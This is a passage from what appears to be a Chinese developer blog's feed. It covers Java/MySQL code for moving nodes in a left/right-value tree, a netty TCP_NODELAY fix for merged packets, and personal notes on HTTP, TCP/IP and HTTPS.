class="line">}</span><br></pre></td></tr></table></figure><p>示例代码以移动菜单为例,LEFT_VALUE,RIGHT_VALUE分别对应左值和右值</p><p>lockTables(),mysql锁表代码:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbcTemplate.update("<span class="keyword">LOCK</span> <span class="keyword">TABLES</span> <span class="string">"+tableName+"</span> WRITE<span class="string">")</span></span><br></pre></td></tr></table></figure><p>unlockTable() 手动解除锁表:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbcTemplate.update("<span class="keyword">UNLOCK</span> <span class="keyword">TABLES</span> <span class="string">");</span></span><br></pre></td></tr></table></figure><p>之所以要锁表是因为在修改左右值过程中不能有其它事务修改数据,否则会造成左右值错乱,整张表的数据都坏掉,所以这种数据结构有好有坏,要根据场景来使用。</p><h3><span id="移动节点到目标节点后面">移动节点到目标节点后面</span></h3><p>此代码还可以进一步优化,目前有点冗余</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Transactional</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> Integer <span class="title">moveNodeAfter</span><span class="params">(Long moveId,Long targetId )</span> </span>{</span><br><span class="line"><span class="keyword">int</span> result = <span class="keyword">this</span>.moveNodeBefore(moveId, targetId,<span class="keyword">false</span>);</span><br><span class="line"><span class="keyword">if</span>(result><span class="number">0</span>) {</span><br><span class="line">result += moveNodeBackward(moveId, targetId);</span><br><span class="line">unlockTables();</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> result;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">int</span> <span class="title">moveNodeBackward</span><span class="params">(Long moveId,Long targetId)</span> </span>{</span><br><span class="line">Menu moveMenu = <span class="keyword">this</span>.selectById(moveId);</span><br><span class="line"></span><br><span class="line">Menu targetMenu = <span class="keyword">this</span>.selectById(targetId);</span><br><span class="line"></span><br><span class="line">Integer nodeLeft = moveMenu.getLeftValue();</span><br><span class="line">Integer nodeRight = moveMenu.getRightValue();</span><br><span class="line"></span><br><span class="line">Integer targetLeft = targetMenu.getLeftValue();</span><br><span class="line">Integer targetRight = targetMenu.getRightValue();</span><br><span class="line"></span><br><span class="line">Integer nodeDist = nodeRight - nodeLeft+<span class="number">1</span>; <span class="comment">//确定要移动的范围</span></span><br><span class="line"></span><br><span class="line">Integer targetDist = targetRight - targetLeft+<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">List<Long> ids = jdbcTemplate.queryForList(<span class="string">"SELECT ID FROM "</span>+tableName+<span class="string">" WHERE LEFT_VALUE >= ? AND RIGHT_VALUE<=?"</span>,Long.class,targetLeft,targetRight);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">StringBuilder sql = <span class="keyword">new</span> StringBuilder(<span class="string">"UPDATE "</span>);</span><br><span class="line">sql.append(tableName);</span><br><span class="line">sql.append(<span class="string">" SET LEFT_VALUE = CASE WHEN LEFT_VALUE >= :nodeLeft THEN LEFT_VALUE + :targetDist ELSE LEFT_VALUE END ,"</span>);</span><br><span class="line">sql.append(<span class="string">"RIGHT_VALUE = CASE WHEN RIGHT_VALUE <= :nodeRight THEN RIGHT_VALUE + :targetDist ELSE RIGHT_VALUE END "</span>);</span><br><span class="line">sql.append(<span class="string">"WHERE LEFT_VALUE >= :nodeLeft AND RIGHT_VALUE <= :nodeRight"</span>);</span><br><span class="line"></span><br><span class="line">MapSqlParameterSource params = <span class="keyword">new</span> MapSqlParameterSource();</span><br><span class="line">params.addValue(<span class="string">"nodeLeft"</span>, nodeLeft);</span><br><span class="line">params.addValue(<span class="string">"nodeRight"</span>, nodeRight);</span><br><span class="line">params.addValue(<span class="string">"targetLeft"</span>, targetLeft);</span><br><span class="line">params.addValue(<span class="string">"targetRight"</span>, targetRight);</span><br><span class="line">params.addValue(<span class="string">"nodeDist"</span>, nodeDist);</span><br><span class="line">params.addValue(<span class="string">"targetDist"</span>, targetDist);</span><br><span class="line">params.addValue(<span class="string">"ids"</span>, ids);</span><br><span class="line"></span><br><span class="line">NamedParameterJdbcTemplate namedParameterJdbcTemplate = <span class="keyword">new</span> NamedParameterJdbcTemplate(jdbcTemplate);</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> result=namedParameterJdbcTemplate.update(sql.toString(),params);</span><br><span class="line"></span><br><span class="line">sql = <span class="keyword">new</span> StringBuilder(<span class="string">"UPDATE "</span>);</span><br><span class="line">sql.append(tableName);</span><br><span class="line">sql.append(<span class="string">" SET LEFT_VALUE = LEFT_VALUE - :nodeDist,RIGHT_VALUE = RIGHT_VALUE - :nodeDist "</span>);</span><br><span class="line">sql.append(<span class="string">"WHERE LEFT_VALUE >= :targetLeft AND RIGHT_VALUE <= :targetRight AND ID IN (:ids) "</span>);</span><br><span class="line"></span><br><span class="line">result+=namedParameterJdbcTemplate.update(sql.toString(),params);</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h3><span id="移动节点到目标节点的子节点最后一位">移动节点到目标节点的子节点最后一位</span></h3><p>移到节点到目标节点的下面,作为其子节点,并排在其子节点的最后一位,被移动节点的子节点也会跟着一并移动,代码示例:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Title</span>: moveNodeByParentAsLastChild</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Description</span>: 移动菜单到目标菜单下作为目标菜单的最后一个子菜单</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> reinershir</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@date</span> 2021年5月26日</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> moveId 要移动的菜单ID</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> targetId 目标父菜单ID</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@return</span></span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="meta">@Transactional</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">int</span> <span class="title">moveNodeByParentAsLastChild</span><span class="params">(Long moveId,Long targetId)</span> </span>{</span><br><span class="line"><span class="comment">//LOCK TABLE</span></span><br><span class="line"><span class="keyword">this</span>.lockTable();</span><br><span class="line"> </span><br><span class="line">Menu moveMenu = <span class="keyword">this</span>.selectById(moveId);</span><br><span class="line"></span><br><span class="line">Menu targetMenu = <span class="keyword">this</span>.selectById(targetId);</span><br><span class="line"></span><br><span class="line">Integer moveLeft = moveMenu.getLeftValue(); </span><br><span class="line"></span><br><span class="line">Integer moveRight = moveMenu.getRightValue();</span><br><span class="line"><span class="comment">////要移动菜单的范围,即被移动菜单及其子节点的左右值范围</span></span><br><span class="line">Integer moveDistance = moveRight - moveLeft+<span class="number">1</span>; </span><br><span class="line"></span><br><span class="line">Integer level = moveMenu.getLevel();</span><br><span class="line"></span><br><span class="line">Integer targetRight = targetMenu.getRightValue();</span><br><span class="line"></span><br><span class="line">Integer targetLevel = targetMenu.getLevel();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>((targetMenu.getLeftValue()>=moveLeft&&targetRight<=moveRight)||(moveId==targetId)) {</span><br><span class="line">unlockTables();</span><br><span class="line"><span class="keyword">return</span> -<span class="number">1</span>;</span><br><span class="line">}</span><br><span class="line">Integer result = <span class="number">0</span>;</span><br><span class="line"><span class="comment">//设置子节点的新值 </span></span><br><span class="line">StringBuilder sql = <span class="keyword">new</span> StringBuilder(<span class="string">"UPDATE "</span>);</span><br><span class="line">sql.append(tableName);</span><br><span class="line">sql.append(<span class="string">" SET LEFT_VALUE = CASE WHEN LEFT_VALUE > :targetRight THEN LEFT_VALUE + :moveDistance ELSE LEFT_VALUE END ,"</span>);</span><br><span class="line">sql.append(<span class="string">"RIGHT_VALUE = CASE WHEN RIGHT_VALUE >= :targetRight THEN RIGHT_VALUE + :moveDistance ELSE RIGHT_VALUE END "</span>);</span><br><span class="line">sql.append(<span class="string">"WHERE RIGHT_VALUE >= :targetRight"</span>);</span><br><span class="line"></span><br><span class="line">MapSqlParameterSource params = <span class="keyword">new</span> MapSqlParameterSource();</span><br><span class="line">params.addValue(<span class="string">"moveLeft"</span>, moveLeft);</span><br><span class="line">params.addValue(<span class="string">"moveRight"</span>, moveRight);</span><br><span class="line">params.addValue(<span class="string">"targetRight"</span>, targetRight);</span><br><span class="line">params.addValue(<span class="string">"moveDistance"</span>, moveDistance);</span><br><span class="line"></span><br><span class="line">NamedParameterJdbcTemplate namedParameterJdbcTemplate = <span class="keyword">new</span> NamedParameterJdbcTemplate(jdbcTemplate);</span><br><span class="line"></span><br><span class="line">result+=namedParameterJdbcTemplate.update(sql.toString(),params);</span><br><span class="line"></span><br><span class="line"><span class="comment">//再次查询 </span></span><br><span class="line">moveMenu = <span class="keyword">this</span>.selectById(moveId);</span><br><span class="line">moveLeft = moveMenu.getLeftValue(); </span><br><span class="line">moveRight = moveMenu.getRightValue();</span><br><span class="line"></span><br><span class="line">Integer newDistance = targetRight>=moveLeft?targetRight-moveLeft:moveLeft - targetRight;</span><br><span class="line">Integer newDistanceOperator = targetRight >=moveLeft?<span class="number">1</span>:<span class="number">0</span>;</span><br><span class="line">params.addValue(<span class="string">"newDistanceOperator"</span>, newDistanceOperator);</span><br><span class="line">params.addValue(<span class="string">"newDistance"</span>, newDistance);</span><br><span class="line">params.addValue(<span class="string">"level"</span>, level);</span><br><span class="line">params.addValue(<span class="string">"targetLevel"</span>, targetLevel);</span><br><span class="line"><span class="comment">//重新塞入</span></span><br><span class="line">params.addValue(<span class="string">"moveLeft"</span>, moveLeft);</span><br><span class="line">params.addValue(<span class="string">"moveRight"</span>, moveRight);</span><br><span class="line"><span class="comment">//移动节点</span></span><br><span class="line">sql = <span class="keyword">new</span> StringBuilder(<span class="string">"UPDATE "</span>);</span><br><span class="line">sql.append(tableName);</span><br><span class="line">sql.append(<span class="string">" SET LEFT_VALUE = CASE WHEN :newDistanceOperator = 1 THEN LEFT_VALUE + :newDistance ELSE LEFT_VALUE - :newDistance END ,"</span>);</span><br><span class="line">sql.append(<span class="string">"RIGHT_VALUE = CASE WHEN :newDistanceOperator = 1 THEN RIGHT_VALUE + :newDistance ELSE RIGHT_VALUE - :newDistance END ,"</span>);</span><br><span class="line">sql.append(<span class="string">"LEVEL = LEVEL - :level +1 + :targetLevel WHERE RIGHT_VALUE <= :moveRight AND LEFT_VALUE >= :moveLeft"</span>);</span><br><span class="line"></span><br><span class="line">result += namedParameterJdbcTemplate.update(sql.toString(),params);</span><br><span class="line">sql = <span class="keyword">new</span> StringBuilder(<span class="string">"UPDATE "</span>);</span><br><span class="line">sql.append(tableName);</span><br><span class="line">sql.append(<span class="string">" SET LEFT_VALUE = CASE WHEN LEFT_VALUE > :moveRight THEN LEFT_VALUE - :moveDistance ELSE LEFT_VALUE END,"</span>);</span><br><span class="line">sql.append(<span class="string">"RIGHT_VALUE = CASE WHEN RIGHT_VALUE >= :moveRight THEN RIGHT_VALUE - :moveDistance ELSE RIGHT_VALUE END "</span>);</span><br><span class="line">sql.append(<span class="string">"WHERE RIGHT_VALUE >= :moveRight "</span>);</span><br><span class="line"></span><br><span class="line">result+= namedParameterJdbcTemplate.update(sql.toString(),params);</span><br><span class="line">unlockTables();</span><br><span class="line"><span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1><span id="附加说明">附加说明</span></h1><p>表字段对应上一章LEFT_VALUE对应L,RIGHT_VALUE对应R,其余字段名字相同</p>]]></content>
<summary type="html"><h1 id="说明"><a href="#说明" class="headerlink" title="说明"></a>说明</h1><p>在之前的文章:<a href="https://reiner.host/posts/9340b114.html">使用左右值树形数据结构实现树形菜单</a> 中记录了如何使用左右值增删改查节点,本次将记录一下如何移动节点,语言使用JAVA + MYSQL实现。</p>
<p><strong>总体思路</strong></p>
<p>移动节点的大致思路是记录移动节点和目标节点之间的左右值以及其子节点的左右值,移动节点及其子节点左右值和目标节点及其子节点的左右值相互加减。</p>
<p><strong>举例</strong></p>
<p>节点A的左右值是LEFT=1,RIGHT=2,节点B的左右值是LEFT=5,RIGHT=6,现在要将节点A移动到节点B前面,那么它的移动范围就是RIGHT - LEFT + 1,即:2 - 1 +1 = 2,也就是说节点A左右值+2,左右值小于节点B的左右值-2 。</p>
<p>结果:节点A的LEFT = 3 ,RIGHT = 4,节点B前面的节点左右值减了2变成了LEFT=1,RIGHT=2,相当于和节点A换了个位置,如此来达到移动节点的目的</p>
<p>后续的移动到节点B后面、移动到节点B作为其子节点思路相同。</p>
<p><strong>更新</strong></p>
<p>2021-6-22 更新</p>
<p>修复了BUG,最新代码请关注: <a href="https://github.com/reinershir/lui-auth">https://github.com/reinershir/lui-auth</a> 以下代码摘抄自菜单管理功能</p></summary>
<category term="数据结构与算法" scheme="https://reiner.host/categories/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E4%B8%8E%E7%AE%97%E6%B3%95/"/>
<category term="-- 数据结构 -- 算法 -- modified preorder tree traversal -- 左右值树形" scheme="https://reiner.host/tags/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84-%E7%AE%97%E6%B3%95-modified-preorder-tree-traversal-%E5%B7%A6%E5%8F%B3%E5%80%BC%E6%A0%91%E5%BD%A2/"/>
</entry>
<entry>
<title>解决使用netty作为TCP服务端时设备接收消息连包问题</title>
<link href="https://reiner.host/posts/d0c795f9.html"/>
<id>https://reiner.host/posts/d0c795f9.html</id>
<published>2021-06-11T07:28:21.000Z</published>
<updated>2021-12-24T12:18:33.182Z</updated>
<content type="html"><![CDATA[<h1><span id="前言">前言</span></h1><p>在前一章记录了如何使用netty作为TCP通信的服务端:<a href="https://reiner.host/posts/94ca3821.html">点击前往</a> ,本章记录一下如何解决硬件设备在接收到服务端发送过来的消息时有连包的问题。</p><h1><span id="问题描述">问题描述</span></h1><p>在通过监测硬件的收包信息时发现偶尔会出现心跳包和指令“粘”在一块的情况,例如指令的发送内容是:<code>EEFF0103GGHH</code>,心跳包的回复是:<code>EEFF0201GGHH</code>。</p><p>当心跳包返回信息的时候此时正好指令下发,那么设备端就会收到:<code>EEFF0103GGHHEEFF0201GGHH</code>。</p><p>这是由于调用netty的<code>writeAndFlush()</code>方法时并不是马上将数据发送过去,而将它放在一个缓冲池当中,而由于硬件的一发一收通信机制客户端无法对连包的数据做分割,因此这个问题要由服务端解决。</p><span id="more"></span><h1><span id="解决办法">解决办法</span></h1><p>找遍了谷歌、官方文档等资料就是没有说明连包问题的相关资料,大部分资料都是说明如何解决服务端接收TCP消息时产生的粘包、半包等问题。</p><p>最终发现原来netty配置中有个<code>ChannelOption.TCP_NODELAY</code>选项,官网上没有任何介绍,根据名字可知意思为“无延迟TCP”,于是启动类代码修改为如下:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//创建线程组</span></span><br><span class="line"> EventLoopGroup bossGroup = <span class="keyword">new</span> NioEventLoopGroup();</span><br><span class="line"> EventLoopGroup workerGroup = <span class="keyword">new</span> NioEventLoopGroup();</span><br><span class="line"> <span class="keyword">try</span> {</span><br><span class="line"> <span class="comment">//创建启动类</span></span><br><span class="line"> ServerBootstrap b = <span class="keyword">new</span> ServerBootstrap(); </span><br><span class="line"> b.group(bossGroup, workerGroup)</span><br><span class="line"> .channel(NioServerSocketChannel.class)</span><br><span class="line"> .childHandler(<span class="keyword">new</span> ServerInitializer(deviceReportEvent))</span><br><span class="line"> .childOption(ChannelOption.TCP_NODELAY, <span class="keyword">true</span>) <span class="comment">//无延时发送消息</span></span><br><span class="line"> .option(ChannelOption.SO_BACKLOG, <span class="number">256</span>)</span><br><span class="line"> .childOption(ChannelOption.SO_KEEPALIVE, <span class="keyword">true</span>);</span><br><span class="line"> <span class="comment">// 绑定端口,开始接收进来的连接</span></span><br><span class="line"> ChannelFuture f = b.bind(<span class="number">9000</span>).sync();</span><br><span class="line"> <span class="comment">// 等待服务器 socket 关闭 。</span></span><br><span class="line"> f.channel().closeFuture().sync();</span><br></pre></td></tr></table></figure><p>关键代码在于<code>.childOption(ChannelOption.TCP_NODELAY, true)</code>,最终通过抓包发现未在出现连包的情况。</p><p>由于我这边的特殊情况,在发送消息时我还加了一层保障,防止心跳回复与指令冲突,示例代码如下:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Title</span>: writeAndFlush</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Description</span>: 返回消息到客户端</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> reiner_shir</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> channel</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> respData</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">writeAndFlush</span><span class="params">(Channel channel,<span class="keyword">byte</span>[] respData)</span> </span>{</span><br><span class="line"><span class="keyword">final</span> ByteBuf respBuf = channel.alloc().buffer(respData.length);</span><br><span class="line">respBuf.writeBytes(respData);</span><br><span class="line"><span class="keyword">synchronized</span> (channel) {</span><br><span class="line">ChannelFuture future = channel.writeAndFlush(respBuf);</span><br><span class="line"><span class="keyword">if</span>(future!=<span class="keyword">null</span>) {</span><br><span class="line"><span class="keyword">try</span> {</span><br><span class="line">future.sync();</span><br><span class="line">} <span class="keyword">catch</span> (InterruptedException e) {</span><br><span class="line">e.printStackTrace();</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>在前一章记录了如何使用netty作为TCP通信的服务端:<a href="https://reiner.host/posts/94ca3821.html">点击前往</a> ,本章记录一下如何解决硬件设备在接收到服务端发送过来的消息时有连包的问题。</p>
<h1 id="问题描述"><a href="#问题描述" class="headerlink" title="问题描述"></a>问题描述</h1><p>在通过监测硬件的收包信息时发现偶尔会出现心跳包和指令“粘”在一块的情况,例如指令的发送内容是:<code>EEFF0103GGHH</code>,心跳包的回复是:<code>EEFF0201GGHH</code>。</p>
<p>当心跳包返回信息的时候此时正好指令下发,那么设备端就会收到:<code>EEFF0103GGHHEEFF0201GGHH</code>。</p>
<p>这是由于调用netty的<code>writeAndFlush()</code>方法时并不是马上将数据发送过去,而将它放在一个缓冲池当中,而由于硬件的一发一收通信机制客户端无法对连包的数据做分割,因此这个问题要由服务端解决。</p></summary>
<category term="JAVA" scheme="https://reiner.host/categories/JAVA/"/>
<category term="netty" scheme="https://reiner.host/tags/netty/"/>
<category term="TCP服务端" scheme="https://reiner.host/tags/TCP%E6%9C%8D%E5%8A%A1%E7%AB%AF/"/>
<category term="TCP粘包" scheme="https://reiner.host/tags/TCP%E7%B2%98%E5%8C%85/"/>
<category term="TCP半包" scheme="https://reiner.host/tags/TCP%E5%8D%8A%E5%8C%85/"/>
<category term="16进制通信" scheme="https://reiner.host/tags/16%E8%BF%9B%E5%88%B6%E9%80%9A%E4%BF%A1/"/>
</entry>
<entry>
<title>HTTP&TCP/IP协议自我总结</title>
<link href="https://reiner.host/posts/cc861966.html"/>
<id>https://reiner.host/posts/cc861966.html</id>
<published>2021-05-25T02:58:11.000Z</published>
<updated>2021-12-24T12:18:32.976Z</updated>
<content type="html"><![CDATA[<h1><span id="http-https-tcpip总结">HTTP、HTTPS、TCP/IP总结</span></h1><h4><span id="协议分类">协议分类</span></h4><p>HTTP属于应用层协议,TCP属于传输层协议,IP属于网络层协议,一个HTTP协议由IP协议包体包含了TCP协议内容,而TCP协议包体又包括了HTTP协议内容,就像一个洋葱。</p><h4><span id="http请求历程">HTTP请求历程</span></h4><p>一个HTTP请求的完整历程,首先会根据URL解析请求的地址和端口,此时的地址拿到的一般是域名,因此还需要根据DNS服务器获取域名的真实IP。</p><p>NDS服务查询完毕后,此时浏览器会调用Socket库将HTTP协议里的内容包装成TCP或者UDP协议包。</p><p>光靠TCP协议还无法具备传输功能,因此TCP还需要借助IP协议来定位目标服务器在互联网中的位置,光靠IP依旧无法准确定位,因为一个IP可能有好几台设备使用,要明确要传输的目标还得在IP头部加上目标的MAC地址。</p><p>最后由网卡将数字信息转换为光信号经网线发送出去,将服务器通过交换机和路由器接收到请求包后像剥洋葱一样一层一层解析包中内容。</p><p>小结,一个HTTP请求总共要经历如下几层协议:</p><ul><li><p>应用层:定义数据格式,并按照对应的格式解读数据。 –HTTP</p></li><li><p>传输层:定义端口,确认主机上应用程序的身份,并将数据包交给对应的应用程序。 –TCP</p></li><li><p>网络层:定义IP地址,确认主机所在的网络位置,并通过IP进行MAC寻址,对外网数据包进行路由转发。 –IP</p></li><li><p>链路层:对0和1进行分组,定义数据帧,确认主机的物理地址,传输数据。 –物理传输</p></li></ul><span id="more"></span><p>此外 IP 中还包括 ICMP 协议和 ARP 协议。</p><p>1、ICMP 用于告知网络包传送过程中产生的错误以及各种控制信息。<br>2、ARP 用于根据 IP 地址查询相应的以太网 MAC 地址。</p><h4><span id="tcp为什么需要三次握手">TCP为什么需要三次握手</span></h4><p>面试中问烂的问题了,在 HTTP 传输数据之前,首先需要 TCP 建立连接,TCP 连接的建立,通常称为三次握手。这个所谓的「连接」,只是双方计算机里维护一个状态机。</p><p>一开始,客户端和服务端都处于 CLOSED 状态。先是服务端主动监听某个端口,处于 LISTEN 状态。然后客户端主动发起连接 SYN,之后处于 SYN-SENT 状态。</p><p>服务端收到发起的连接,返回 SYN,并且 ACK 客户端的 SYN,之后处于 SYN-RCVD 状态。客户端收到服务端发送的 SYN 和 ACK 之后,发送 ACK 的 ACK,之后处于 ESTABLISHED状态,因为它一发一收成功了。</p><p>服务端收到 ACK 的 ACK 之后,处于 ESTABLISHED 状态,因为它也一发一收了。<strong>所以三次握手目的是保证双方都有发送和接收的能力。</strong></p><p><img src="" alt="avatar"></p><h4><span id="tcp为什么需要四次挥手">TCP为什么需要四次挥手</span></h4><p>同样是面试中经常问的问题,简单来说就是当客户端发送FIN(断开连接)请求时服务器并不是马上断开连接,因为此时对方可能还处于数据的收发中,也就是说之前发送的数据可能还未接收完。</p><p>当客户端数据接收完毕后,会返回FIN和序号+1的回复表示已经接收完毕,可以断开连接了,此时服务收到这条回复才真的断开连接,借用一张图表示如下:</p><p><img src="" alt="avatar"></p><h4><span id="tcp为什么是可靠传输协议">TCP为什么是可靠传输协议</span></h4><p>通过上图可知,TCP是通过<strong>确认号(ACK)**和</strong>序号(SEQ)**,来保证数据顺序以及丢包重发,即某个带序号的包没有收到回复,那么TCP会重发该包直到确认送达。</p><p><img src="" alt="avatar"></p><h4><span id="追加内容-https总结">追加内容-HTTPS总结</span></h4><p>更新日期:2021-6-7 14:07 ,1202年了,基本上所有的网站都使用了HTTPS,已经少有网站使用HTTP了,在这里总结下为什么HTTPS传输是安全的。</p><p><strong>为何需要HTTPS?</strong></p><p>因为HTTP是明文传输,可以被中间人攻击。</p><p><strong>如何保证传输安全?</strong></p><p>所有请求加密传输,客户端请求服务器获取公钥 -> 服务器返回公钥 -> 客户端生成密钥发送给服务器 -> 最终所有通信都使用该密钥加密再传输。</p><p>由于密钥只有客户端和服务端持有,中间人即使截获也无法修改内容,因此传输过程是安全的。</p><p>但是这是理想情况,中间人可以截获服务器返回的公钥并返回自己生成的私钥给服务器,因此这个时候就要引进CA证书机构。</p><p><strong>CA证书机构保证密钥传输安全</strong></p><p>既然直接传输无法保证密钥安全,所以引进一个可信任的第三方机构来发放证书,证书中包括公钥,浏览器从证书获取公钥,且证书使用了数字签名来防止被篡改。</p><p>浏览器通过该机构的公钥将证书内容做HASH运算并比较运算结果来检测证书是否被篡改。</p><p><strong>证书机构的公钥从何而来?如何保证证书机构的公钥是可信的?</strong></p><p>浏览器和操作系统会预装可信任的CA机构的根证书,根证书中附带了CA机构的公钥(这就是为什么不要随便安装证书)。</p><p>总结,HTTPS = 加密传输+CA证书机构 </p><h1><span id="关于tcp详细的文章推荐">关于TCP详细的文章推荐</span></h1><p>在浏览器地址栏输入一个URL后回车,背后会进行哪些技术步骤? - 小林coding的回答 - 知乎</p><p><a href="https://www.zhihu.com/question/34873227/answer/1657140394">https://www.zhihu.com/question/34873227/answer/1657140394</a></p>]]></content>
<summary type="html"><h1 id="HTTP、HTTPS、TCP-IP总结"><a href="#HTTP、HTTPS、TCP-IP总结" class="headerlink" title="HTTP、HTTPS、TCP/IP总结"></a>HTTP、HTTPS、TCP/IP总结</h1><h4 id="协议分类"><a href="#协议分类" class="headerlink" title="协议分类"></a>协议分类</h4><p>HTTP属于应用层协议,TCP属于传输层协议,IP属于网络层协议,一个HTTP协议由IP协议包体包含了TCP协议内容,而TCP协议包体又包括了HTTP协议内容,就像一个洋葱。</p>
<h4 id="HTTP请求历程"><a href="#HTTP请求历程" class="headerlink" title="HTTP请求历程"></a>HTTP请求历程</h4><p>一个HTTP请求的完整历程,首先会根据URL解析请求的地址和端口,此时的地址拿到的一般是域名,因此还需要根据DNS服务器获取域名的真实IP。</p>
<p>NDS服务查询完毕后,此时浏览器会调用Socket库将HTTP协议里的内容包装成TCP或者UDP协议包。</p>
<p>光靠TCP协议还无法具备传输功能,因此TCP还需要借助IP协议来定位目标服务器在互联网中的位置,光靠IP依旧无法准确定位,因为一个IP可能有好几台设备使用,要明确要传输的目标还得在IP头部加上目标的MAC地址。</p>
